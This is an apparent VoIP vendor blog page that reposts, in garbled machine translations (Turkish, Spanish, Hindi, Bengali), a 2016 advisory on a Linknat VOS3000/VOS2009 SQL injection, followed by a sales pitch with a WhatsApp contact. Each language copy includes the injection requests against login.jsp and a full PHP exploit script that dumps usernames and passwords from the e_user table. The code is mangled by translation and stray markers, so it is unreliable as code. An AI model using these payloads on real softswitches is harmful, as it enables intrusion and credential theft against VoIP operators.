2016'dan itibaren Vos3000 kesmek için bazı sql enjeksiyon yumuşak mallar kullanarak, Biz o zaman kendi güvenlik sistemi var, biz şimdi çok güçlü güvenlik sistemi güncelledi, benim iş odak voip soft-switch için güvenlik için her zaman oldu. Çoğu zaman ücretsiz tavsiye verdi veya mümkün olduğunca ücretsiz bilgi paylaştı. Hala kirli şeyler etrafında çalışan bir sürü, bu yüzden her zaman dikkatli olun ve daha fazla bilgi lütfen. Aksi takdirde asla iyi bir iş yapamazsınız. Şimdi-a-gün İnsanlar VOSServer kesmek için VOS3000 İstemci yazılımı gizli komut dosyaları veya kötü amaçlı yazılımlar kullanarak.

Whatsapp beni knock daha fazla yardım için: +8801911119966 – i tüm yolları yardımcı olacaktır.

Cómo VOS3000 Conseguir Hackeado por SQL Inyección Script, evitar la piratería!

June 4, 2019November 22, 2020 king

Inyección SQL Linknat VOS2009/VOS3000


Desde: Osama Khalid <osama ()="" codinghazard="" com="">
Fecha: Jue, 19 May 2016 16:52:54 +0500</osama>


Se encontró una inyección SQL en Linknat VOS3000/VOS2009, un VoIP popular
softswitch, que podría permitir a los atacantes remotos obtener acceso a la
credenciales almacenadas en texto sin formato.

Aplicación: Linknat VOS3000/VOS2009
Versiones afectadas: 2.1.1.5, 2.1.1.8, 2.1.2.0
URL del proveedor: http://www.linknat.com/
Error: SQLi (con privilegios DBA)
Tipo: Remoto
Resolución: Corregido, actualización a 2.1.2.4 o 2.1.6.0 Versión limpia
Referencia: WooYun-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

El SQLi reportado es ciego basado en el tiempo. Dado que no es un SQLi en banda, el
resultados pueden obtenerse de la salida de la bienvenida.jsp durante el mismo
Sesión.

(1a solicitud)

POST http://target/eng/login.jsp
PARAM loginType-1
        name ' unión seleccione 1,2,@@version,'hola',5,6?
        pase ' O ''' '

(2a solicitud durante la misma sesión)

OBTENGA http://target/eng/welcome.jsp
RESULTADO 0 ' selección de unión
1,2,@@version,'hola',5,6'1'5.0.51a-comunidad''hola'0.00'0.00'

[ EXPLOIT CODE ]<?php
#
# Linknat VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_[1]one   = isset($argv) ? $argv :[2] "loginna[2]me";
$column_two   = isset($argv) ? $argv : [3]"password[3]";
$table        = isset($argv) ? $argv : "[4]e_user";
[4]$other        = isset($argv) ? $argv : ""[5];

functi[5]on banner() {
    echo "########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";
    echo "php vos3[HOST]000.php 127.0.0.1n";
    echo "php vos3000.php     n";
    echo "php v[HOST]o[COL1]s[COL2]3[TABLE]00[OTHER SQL]0.php 127.0.0.1 table_schema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) ?
        foreach ( $post como $key > $value)
            $post_items : $key . '=' . urlencode($value);
 []       $post_string á implode('&', $post_items);
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post_string);
    }
    $data - curl_exec($curl);
    curl_close($curl);
    $data de retorno;
}

consulta de función ($host, $query)
    $data á curl("http://$host/eng/login.jsp";, array(
            "loginType" (> 1,
            "nombre" > "' unión " . $query . "#",
            "pasar" > "' O ''''"
        ), null, true);
    preg_match_all('' Set-Cookie: (.*$matches $data);
    $cookies de implode('; ', $matches);
    $data á curl("http://$host/eng/welcome.j[1]sp";, array(), $cookies, false);
    $parts de explosión ("", recorte($data));

si (cuenta($parts) < 7)
        return false;

    return array($parts, $parts);
}

function ascii_table($data) {
    [3]$keys = [4]array_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid de n.o s2 ($wid, strlen($v));
    }
    foreach($wi[$k]d as $k ?> [$k]$v)
        $fmt : "%--$v";
        $sep á str_repeat('-', $v);
   [$k] }
    $fmt de la página d[$k]e la casa de la casa de los ' . implode(' ? ', $fmt) . ' |';
    $sep '+-' . implode('-+-', $sep) . '-+';
    $buf á array($sep, vsprintf($fmt, $keys), $sep);
    foreach($data as $row) ?
        $buf : vsprintf($fmt, $row)[];
        $buf á $sep;
    }
    implo[]de de retorno ("n", $buf);
}

banner();
echo "n";
echo "Target: $host-n";
echo "Column #1: $column_one-n";
echo "#2 de columnas: $column_two-n";
echo "Tabla: $table";
echo "Otros: $other";
echo "n";

$results - array();
$count_result á query($host, "SELECT 1,2,COUNT(*),4,5,6 FROM $table
$other");
si ($count_result) ?
    $count de intval($count_result);
    echo "Found $count rows...

para[0] ($i-0;<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $column_two="" .=[0]"" "=" . hex2bin($result) .
" n";="" }="" else="[1]" {="" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($column_one" []==""> hex2bin $i($result), $column_dos
•[0]> hex2bin($result));
    }

if (c[1]ount($results) > 0)
        echo de eco ". ascii_table($results) . "n";
    }
•otra cosa?
    echo "Error al recuperar el recuento de filas";
}

?></$count;>

A partir de 2016 Personas que utilizan algunos productos blandos de inyección sql para hackear VOS3000, Tenemos nuestro propio sistema de seguridad de ese momento, actualizamos nuestro sistema de seguridad demasiado fuerte ahora, mi enfoque de trabajo siempre fue para la seguridad para voip soft-switch. La mayoría de las veces di consejos gratuitos o compartía información tanto como posible sin costo. Todavía hay un montón de cosas sucias corriendo alrededor, así que por favor tenga cuidado siempre y sepa más. De lo contrario, nunca podrás hacer un buen negocio. Ahora en día Las personas que utilizan scripts ocultos o malwares en el software cliente VOS3000 para hackear VOS Server.

Para más ayuda Knock me en whatsapp: +8801911119966 – voy a hacer ayuda a todas las maneras.

कैसे VOS3000 SQL इंजेक्शन स्क्रिप्ट द्वारा काट दिया हो, हैकिंग को रोकने के!

June 4, 2019November 22, 2020 king

Linknat VOS2009/VOS3000 SQL इंजेक्शन


से: ओसामा खालिद <osama ()="" codinghazard="" com="">त
िथि: Thu, 19 मई २०१६ 16:52:54 + ०५००</osama>


एक एसक्यूएल इंजेक्शन Linknat VOS3000/VOS2009, एक लोकप्रिय वीओआईपी में पाया गया था
सॉफ्टस्विच, जो दूरदराज के हमलावरों को पहुंच प्राप्त करने की अनुमति दे सकता है
सादे पाठ में संग्रहीत साख।

आवेदन: लिंकनट VOS3000/VOS2009
प्रभावित संस्करण: 2.1.1.5, 2.1.1.8, 2.1.2.0
विक्रेता यूआरएल: http://www.linknat.com/
बग: एसक्यूली (डीबीए विशेषाधिकारों के साथ)
प्रकार: रिमोट
रिज़ॉल्यूशन: फिक्स्ड, 2.1.2.4 या 2.1.6.0 स्वच्छ संस्करण में अपग्रेड करें
संदर्भ: वूयून-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

SQLi रिपोर्ट समय आधारित अंधा है । चूंकि यह एक इन-बैंड SQLi नहीं है,
परिणाम उसी के दौरान स्वागत के उत्पादन से इकट्ठा किया जा सकता है.jsp
सत्र।

(पहला अनुरोध)

पद http://target/eng/login.jsp
परम लॉगइनटाइप =1
        नाम = ' संघ का चयन 1,2,@@version, 'नमस्ते', 5,6#
        पास =' या ''='

(इसी सत्र के दौरान दूसरा अनुरोध)

http://target/eng/welcome.jsp जाओ
परिणाम 0.' संघ का चयन
1,2,@@version, 'hello', 5,6 #.1.5.0.51a-community.hello.0.00.0.00.

<?php
#
# Linknat [ EXPLOIT CODE ]VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_one   = isset[1]($argv) ? $argv : "loginname"[2];
$column_[2]two   = isset($argv) ? $argv : "password";
[3]$table   [3]     = isset($argv) ? $argv : "e_user";
$o[4]ther      [4]  = isset($argv) ? $argv : "";

function[5] banner()[5] {
    echo "########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";
    echo "php vos3000.ph[HOST]p 127.0.0.1n";
    echo "php vos3000.php     n";
    echo "php vos3000[HOST].[COL1]p[COL2]h[TABLE]p[OTHER SQL] 127.0.0.1 table_schema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) {
        फोरच ($post $key = > $value)
            $post_आइटम = $key । '=' . यूरेनकोड ($value);
        []$post_स्ट्रिंग = फटना ('&', $post_आइटम);
        curl_setopt ($curl, CURLOPT_POST, 1);
        curl_setopt ($curl, CURLOPT_POSTFIELDS, $post_स्ट्रिंग);
    }
    $data = curl_exec ($curl);
    curl_close ($curl);
    $data लौटें;
}

फंक्शन क्वेरी ($host, $query) {
    $data = कर्ल ("http://$host/eng/login.jsp";, सरणी (
            "लॉगिनटाइप" = > 1,
            "नाम" = > "संघ" । $query । "#",
            "पास" = > "' या '='"
        ), अशक्त, सच है);
    preg_match_all ('। सेट-कुकी: (.*);..यू', $data, $matches);
    $cookies = फटना ('; ', $matches);
    $data = कर्ल ("http://$host/eng/welcome.j[1]sp";, सरणी (), $cookies, झूठी);
    $parts = विस्फोट (".., ट्रिम ($data));

यदि (गिनती ($parts) < 7)
        return false;

    return array($parts, $parts);
}

function ascii_table($data) {
    $[3]keys = a[4]rray_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid = अधिकतम ($wid, स्ट्रेन ($v));
    }
    फोरच ($k [$k]= > $v) के [$k]रूप में $wid {
        $fmt = "%-{$v}s";
        $sep = str_repea[$k]t ('-', $v);
    }
    $fmt[$k] = '। ' . फटना (' । ', $fmt) । ' |';
    $sep = '+-' । फटना ('-+-', $sep) । '-+';
    $buf = सरणी ($sep, वेस्प्रिंट ($fmt, $keys), $sep);
    फोरच ($row के रूप में $data) {
        $buf = vsprintf ($fmt, $row);
        $[]buf = $sep;
    }
    वापसी फटना ("n[]", $buf);
}

बैनर ();
गूंज "n";
गूंज "लक्ष्य: $host  n";
गूंज "कॉलम #1: $column_onen";
गूंज "कॉलम #2: $column_दो n";
गूंज "तालिका: $table n";
गूंज "अन्य: $other n";
गूंज "n";

$results = सरणी ();
$count_result = क्वेरी ($host, "1,2,काउंट (*), 4,5,6 से $table
$other");
यदि ($count_result) {
    $count = intval ($count_result);
    गूंज "पंक्तियों $count पाया...n";

के लिए ($i = [0]0; $i<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $column_two="" .=[0]"" "=" . hex2bin($result) .
" n";="" }="" else=[1]"" {="" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($column_on[]e" ==""> hex2bin ($result), $column_two
[0]=> हेक्स2बिन ($result));
    }

य[1]दि (गिनती ($results) > 0) {
        गूंज "nn" । ascii_table ($results) । "n";
    }
}अन्य {
    गूंज "त्रुटि पुनः प्राप्त पंक्ति गिनती";
}

?></$count;>

2016 से लोग VOS3000 हैक करने के लिए कुछ वर्ग इंजेक्शन सॉफ्ट माल का उपयोग करते हैं, हमारे पास उस समय से हमारी अपनी सुरक्षा प्रणाली है, हमने अपनी सुरक्षा प्रणाली को अपडेट किया है, अब हमने अपनी सुरक्षा प्रणाली को भी मजबूत किया है, मेरा काम ध्यान वीओआईपी सॉफ्ट-स्विच के लिए सुरक्षा के लिए हमेशा था। अधिकांश समय मैंने मुफ्त सलाह दी या जितना संभव हो उतना मुफ्त जानकारी साझा की। फिर भी बहुत सारी गंदी चीजें चल रही हैं, इसलिए कृपया हमेशा सावधान रहें और अधिक जानें। वरना आप कभी भी अच्छा बिजनेस नहीं कर पाएंगे। अब-एक दिन VOS सर्वर हैक करने के लिए VOS3000 क्लाइंट सॉफ्टवेयर में छिपी स्क्रिप्ट या मैलवेयर का उपयोग कर रहे लोग।

अधिक मदद के लिए मुझे whatsapp में दस्तक: + ८८०१९११११९९६६-मैं सभी तरीकों से मदद करेंगे ।

কিভাবে VOS3000 SQL ইনজেকশন স্ক্রিপ্ট দ্বারা হ্যাক করা হয়, হ্যাকিং প্রতিরোধ!

June 4, 2019November 22, 2020 king

Linknat VOS2009/VOS3000 SQL ইনজেকশন


থেকে: ওসামা খালিদ <osama ()="" codinghazard="" com="
">তারিখ: 19 মে, 2016 16:52:54 +0500</osama>


একটি এসকিউএল ইনজেকশন লিঙ্কনাট VOS3000/VOS2009, একটি জনপ্রিয় ভিওআইপি পাওয়া গেছে
সফটসুইচ, যা দূরবর্তী আক্রমণকারীদের অ্যাক্সেস পেতে অনুমতি দিতে পারে
সরল-পাঠে সংরক্ষিত প্রমাণপত্রাদি।

আবেদন: লিঙ্কনাট VOS3000/VOS2009
সংস্করণ প্রভাবিত: 2.1.1.5, 2.1.1.8, 2.1.2.0
বিক্রেতার ইউআরএল: http://www.linknat.com/
বাগ: SQLi (DBA সুবিধা সহ)
ধরন: দূরবর্তী
রেজোলিউশন: ফিক্সড, আপগ্রেড 2.1.2.4 অথবা 2.1.6.0 পরিষ্কার সংস্করণ
রেফারেন্স: WooYun-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

এসকিউলি রিপোর্ট করেছে যে সময় ভিত্তিক অন্ধ। যেহেতু এটি একটি ইন-ব্যান্ড SQLI নয়,
ফলাফল স্বাগতম আউটপুট থেকে সংগ্রহ করা যেতে পারে.jsp একই সময়ে
সুসংবদ্ধ।

(১ম অনুরোধ)

পোস্ট http://target/eng/login.jsp
PARAM লগইনটাইপ=1
        name=' ইউনিয়ন নির্বাচন 1,2,@@version,'হ্যালো', 5,6#
        পাস=' অথবা '='

(একই অধিবেশনে ২য় অনুরোধ)

http://target/eng/welcome.jsp
ফলাফল 0|' ইউনিয়ন নির্বাচন
1,2,@@version,'হ্যালো', 5,6#|1|5.0.51a-সম্প্রদায়|হ্যালো|0.00|0.00|

<?php
#
# Linknat VOS2[ EXPLOIT CODE ]009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_one   = isset($argv) ? [1]$argv : "loginname";
$column_[2]two   = i[2]sset($argv) ? $argv : "password";
$table    [3]    = isse[3]t($argv) ? $argv : "e_user";
$other        [4]= isset($[4]argv) ? $argv : "";

function banner() {
[5]    echo [5]"########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";
    echo "php vos3000.php 127.0.0.1n";
  [HOST]  echo "php vos3000.php     n";
    echo "php vos3000.php 127.0.0.1 tab[HOST]l[COL1]e[COL2]_[TABLE]s[OTHER SQL]chema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) {
        প্রতিটি ($key => $value হিসাবে $post
            $post আইটেম = $key। '=' . urlencode($value);
        $post স্ট্রিং = ইম[]্প্রোভাইজ করুন('&', $post_আইটেম);
        curl_setopt ($curl, CURLOPT_POST, ১);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post স্ট্রিং);
    }
    $data = curl_exec($curl);
    curl_close($curl);
    $data প্রত্যাবর্তন;
}

ফাংশন কোয়েরি($host, $query) {
    $data = কার্ল ("http://$host/eng/login.jsp";, অ্যারে
            "loginType" => 1,
            "নাম" => "" ইউনিয়ন" । $query । "#",
            "পাস" => "" অথবা "="
        ), শূন্য, সত্য);
    preg_match_all('|' সেট-কুকি: (.*);|U', $data, $matches);
    $cookies = বিস্ফোরিত('; ', $matches);
    $data = কার্ল ("http://$host/eng/welcome.jsp";,[1] অ্যারে(), $cookies, মিথ্যা);
    $parts = বিস্ফোরণ("|", ছাঁটা($data);;

যদি (গণনা($parts) < 7)
        return false;

    return array($parts, $parts);
}

function ascii_table($data) {
    $keys = [3]array_key[4]s(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid = সর্বোচ্চ ($wid, স্ট্রলেন($v);
    }
    প্রতিটি ($k => $v [$k]হিসাবে $wid)[$k] {
        $fmt = "%-{$v}s";
        $sep = str_repeat('-',', $v);[$k]
    }
    $fmt = '| ' . বি[$k]স্ফোরিত(' | ', $fmt)। ' |';
    $sep = '+-'। ('-+-', $sep)। '-+';
    $buf = অ্যারে ($sep, vsprintf($fmt, $keys), $sep);
    $row হিসেবে $data) {
        $buf = vsprintf($fmt, $row);
        $buf = $sep;
    }
    রিটার্ন ই[]ম্প্রোভাইজ ("n", $buf);
}

ব্যানার();[]
"n";
প্রতিধ্বনি "টার্গেট: $hostn";
প্রতিধ্বনি "কলাম #1: $column_একn";
প্রতিধ্বনি "কলাম #2: $column_2n";
প্রতিধ্বনি "টেবিল: $tablen";
প্রতিধ্বনি "অন্যান্য: $othern";
"n";

$results = অ্যারে();
$count_ফলাফল = জিজ্ঞাসা ($host, "নির্বাচন করুন 1,2,Count(*), 4,5,6 থেকে $table
$other");
যদি ($count_ফলাফল) {
    $count = intval ($count_ফলাফল);
    প্রতিধ্বনি "খুঁজে $count সারি...n";

$i=0[0]; $i<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $column_two="" .="" "=[0]" . hex2bin($result) .
" n";="" }="" else="" {="[1]" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($column_one" ==""[]> হেক্স২বিন($result), $column_টু
=> হেক্[0]স২বিন($result);।
    }

যদি (গণনা([1]$results) > 0) {
        প্রতিধ্বনি "nn"। ascii_table($results)। "n";
    }
} অন্যথায় {
    প্রতিধ্বনি "সারি গণনা পুনরুদ্ধারকরতে ত্রুটি";
}

?></$count;>

2016 থেকে যারা VOS3000 হ্যাক করার জন্য কিছু SQL ইনজেকশন নরম সামগ্রী ব্যবহার করে, আমাদের নিজস্ব নিরাপত্তা ব্যবস্থা আছে, আমরা এখন আমাদের নিরাপত্তা ব্যবস্থা খুব শক্তিশালী, আমার কাজের ফোকাস সবসময় ভিওআইপি সফট-সুইচের জন্য নিরাপত্তার জন্য ছিল। বেশিরভাগ সময় আমি বিনামূল্যে উপদেশ দিতাম অথবা যতটা সম্ভব বিনামূল্যে তথ্য শেয়ার করতাম। এখনো অনেক নোংরা জিনিস ঘুরে বেড়াচ্ছে, তাই দয়া করে সবসময় সাবধান থাকুন এবং আরো জানুন। অন্যথায় আপনি কখনোই ভাল ব্যবসা করতে পারবেন না। আজকাল যারা VOS3000 ক্লায়েন্ট সফটওয়্যারে লুকানো স্ক্রিপ্ট বা ম্যালওয়্যার ব্যবহার করে VOS সার্ভার হ্যাক করে.

আরও সাহায্যের জন্য আমাকে হোয়াটসঅ্যাপে নক করুন: +880191119966 – আমি সব উপায়ে সাহায্য করব।

Posts navigation

Older Posts
Newer Posts

Recent Posts

  • Configuración servidor LRN VOS3000 Reliable parámetros SS_LRN_SERVER_IP PORT
  • Portabilidad numérica LRN VOS3000 Proven consulta de carriers EE.UU.
  • Precisión decimal tarifas VOS3000 Accurate configuración FEE_PRECISTION y HOLD_TIME_PRECISION
  • Códigos respuesta SIP CDR VOS3000 Complete Important referencia de 30+ códigos
  • Reemplazo razón fallida VOS3000 Best Strategic configuración personalizada de errores
  • Detección interrupción RTP VOS3000 Accurate monitoreo de medios en cuatro modos
  • VOS3000 Replace Failed Reason Strategic Custom Error Response Configuration
  • VOS3000 Call Forward Signal Easy Recognition Smart SS_RECOGNIZE_CALL_FORWARD_SIGNAL
  • VOS3000 Remote Ring Back Mode Comprehensive Passthrough 183 180 Configuration
  • VOS3000 Callee Source Header Flexible To Request-Line Selection Important
  • VOS3000 Caller Source Header Selection Complete From Remote-Party-ID Display Important
  • VOS3000 LRN Number Portability Proven US Carrier Lookup Configuration
  • VOS3000 LRN Server Configuration Reliable SS_LRN_SERVER_IP PORT Setup
  • VOS3000 Server End Reasons Definitive Important 25-Code Reference Guide
  • VOS3000 H323 Q850 Cause Codes Comprehensive 60-Plus Code Reference
  • VOS3000 SIP Response Codes CDR Complete 30-Plus Important Code Reference
  • VOS3000 SIP Publish Expire: Essential Gateway Concurrency Guide
  • VOS3000 SIP Send Unregister: Essential Registration Cleanup Easy Guide
  • VOS3000 SIP Display From: Important E164 Caller Configuration
  • VOS3000 SIP Routing Gateway Contact: Essential INVITE Header Guide
  • VOS3000 SIP INVITE Timeout and Gateway Switching: Complete Call Setup Guide
  • VOS3000 SIP Privacy Header: Essential Caller ID Protection Guide
  • VOS3000 SIP Outbound Registration Parameters: Expiry and Retry Delay Easy Guide
  • VOS3000 SIP Call Progress Timeout: Complete Signal Chain Guide
  • VOS3000 SIP Resend Interval: Important Message Retransmission Guide
[email protected]
+8801911119966
Change VOS3000 2.1.9.07 Chinese Client to English Client Easy Step!Change VOS3000 2.1.9.07 Chinese Client to English Client Easy Step!
VOS3000 API (2.1.9.07) Connection, Common issues, VOS3000 API easy GuideVOS3000 API (2.1.9.07) Connection, Common issues, VOS3000 API easy Guide
VOS3000 软交换系统完整技术指南(安装、服务器、价格与安全) ImportantVOS3000 软交换系统完整技术指南(安装、服务器、价格与安全) Important
VOS3000 2.1.8.00 / 2.1.8.05 Complete English Manual Download Free!VOS3000 2.1.8.00 / 2.1.8.05 Complete English Manual Download Free!
Proudly powered by WordPress | Theme: Nucleare by CrestaProject.
Back to top
WhatsApp chat